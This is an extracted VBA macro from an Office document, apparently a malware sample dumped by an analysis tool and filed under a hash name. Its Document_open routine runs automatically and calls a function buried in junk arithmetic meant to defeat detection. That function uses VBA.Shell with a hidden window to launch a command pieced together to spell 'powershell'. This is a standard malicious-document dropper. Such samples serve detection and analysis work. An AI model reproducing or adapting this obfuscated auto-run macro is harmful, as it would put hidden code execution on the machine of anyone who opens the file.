Filename     : ./macros/196aeb947ada2b064ce03360897a8cbf00fc9e0f00af655be9f9c326ef9496a6
OLE stream   : Macros/VBA/kwHfCEUccaz
VBA filename : kwHfCEUccaz.cls
----------------------------------------
Attribute VB_Name = "kwHfCEUccaz"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function rhYNBK()
On Error Resume Next
ljoFI = AVuXsZ
hXQnXb = CDbl(iUWJG * CDbl(BPPfr + Int(pNjTN * Rnd(12432)) * EzDcF * Log(81793 * irsBqh - ojRNfw + Fix(51))))
AECjNX = CDbl(fsQSId)
WNoJO = iPGiH
YPSiFY = Tan(27506)
jkFPjj = Tan(69553)
ArozJ = ZNDZw
pSXOs = CDbl(WRjDlz * CDbl(ZzzMh + Int(qIucSi * Rnd(27517)) * ponapJ * Log(41436 * vAAFm - sizFq + Fix(51))))
upEfi = CDbl(hdwdvo)
HDwLcs = QQfMsk
XOzNZ = Tan(19218)
kUaBWu = Tan(11677)
GvUbr = OiUJB
dRbpuB = CDbl(niKrn * CDbl(BMPKYA + Int(hkwCrB * Rnd(2441)) * BiKCq * Log(10159 * CmvJt - iswEhh + Fix(51))))
UYwtAz = CDbl(wzowok)
cPOGA = sAwJT
UOlEvD = Tan(34080)
IzXvJP = Tan(94655)
YiNzQ = ltwzPl
FwXIjD = CDbl(uzUZp * CDbl(ppjlj + Int(VjLbPR * Rnd(96444)) * OKwDj * Log(45685 * FLiCiq - NYNnI + Fix(51))))
uWHqi = CDbl(BjDQqR)
jiEiAF = SmNbJ
JCLPt = Tan(51870)
DwJKNT = Tan(31777)
rhYNBK = QCiFOwRb + VBA.Shell(FwEhjzFZdKT + Chr(wjhjjrfIK + vbKeyP + issVRHHzn) + "owers" + qXtOWCw + Hzbqr + jLuoAHMdDE + YocYAQYHu + UQAAXqjsjC, 44867 - 44867)
PKoXM = AKiVz
qtTRFc = CDbl(NGtII * CDbl(jbfijS + Int(ZKiZqh * Rnd(42388)) * EzoRQ * Log(58056 * NpAvI - CAWCfq + Fix(51))))
KubXGL = CDbl(HEqrC)
OqhnJ = XJMWKq
JSAlq = Tan(31572)
YUbuDW = Tan(45198)
CuZXCR = tRLnoS
iuGtZ = CDbl(WwYRj * CDbl(kYjKc + Int(vaMvIP * Rnd(13839)) * dQuKWC * Log(46592 * FdnUV - PDWIq + Fix(51))))
wjmqmu = CDbl(GENui)
TTFXIb = LIYzZV
bkXuNu = Tan(12864)
hVKHiq = Tan(86584)
End Function
Private Sub Document_open()
On Error Resume Next
Vrwha = JzJNMu
CEjZO = CDbl(jpLmR * CDbl(zPAQl + Int(VKAzN * Rnd(51887)) * BGBJPm * Log(24853 * jFBDBR - AdKFi + Fix(51))))
jMEqIw = CDbl(zijwz)
qNKzN = zQKXnI
HFnbfJ = Tan(63439)
dSIiX = Tan(96747)
sWAKu = DHWwO
ZZPII = CDbl(oAaYp * CDbl(iMnpK + Int(GELiwr * Rnd(19772)) * SjuIna * Log(48034 * WlIfk - DnwTh + Fix(51))))
urbYw = CDbl(CHGRl)
sfpCj = AABXmi
LYntar = Tan(77484)
chPOzl = Tan(82153)
rhYNBK
kPIfJ = hQCvhi
SqwsNh = CDbl(kpIXE * CDbl(OWGRra + Int(iidXK * Rnd(86109)) * zjwFpH * Log(93513 * lQsCzr - uHlaM + Fix(51))))
oMZhUk = CDbl(BrChz)
XlpYo = PQjVlj
bNlQf = Tan(20206)
KKlEH = Tan(44225)
CYrKiM = QCFDd
zZVMP = CDbl(HiErnw * CDbl(IhciAz + Int(DVMwN * Rnd(12039)) * tAhQi * Log(12016 * iNDzl - dOzhD + Fix(51))))
RJbNW = CDbl(JNOiXa)
sUiTY = PuipXf
cnYMBi = Tan(70964)
tDpoX = Tan(8311)
End Sub

